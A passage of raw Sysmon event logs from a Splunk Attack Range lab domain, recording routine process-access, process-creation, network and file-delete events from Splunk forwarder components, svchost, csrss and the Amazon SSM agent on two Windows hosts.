07:51:58.667{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103738Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:58.667{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103737Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:58.667{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B29E-615A-D401-00000000FC01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103736Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:58.667{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B29E-615A-D401-00000000FC01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103735Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:58.667{58E9C193-B29E-615A-D401-00000000FC01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103734Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:58.479{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0D0E3B178676C9329AB4AE36E72D2CB,SHA256=A6DEABCEE74F2D9A3F7820A33B90B83A0DAFB2AF53BDEEE77DB88C5A180A4E7A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081643Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.984{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B29E-615A-4F01-00000000FD01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081642Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.984{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081641Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.984{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081640Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.984{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081639Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.984{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081638Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.984{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081637Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.984{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081636Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.984{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081635Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.984{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081634Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.984{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081633Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.984{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B29E-615A-4F01-00000000FD01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081632Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.984{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B29E-615A-4F01-00000000FD01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081631Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.985{2FDD8D40-B29E-615A-4F01-00000000FD01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000081630Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:56.795{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50043-false10.0.1.12-8000- 23542300x800000000000000081629Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.296{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BCB091135F7ED80735E5A76FE319E34,SHA256=A47C515CFA814E59A3BA33B743C7E0F509145FEF41532EE9A5F1276DF6E30C77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081628Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:58.151{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-024MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103758Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:59.745{58E9C193-B29F-615A-D501-00000000FC01}1046216C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103757Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:59.589{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B29F-615A-D501-00000000FC01}104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103756Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:59.589{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103755Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:59.589{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103754Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:59.589{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103753Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:59.589{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103752Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:59.589{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B29F-615A-D501-00000000FC01}104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103751Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:59.589{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B29F-615A-D501-00000000FC01}104C:\Program 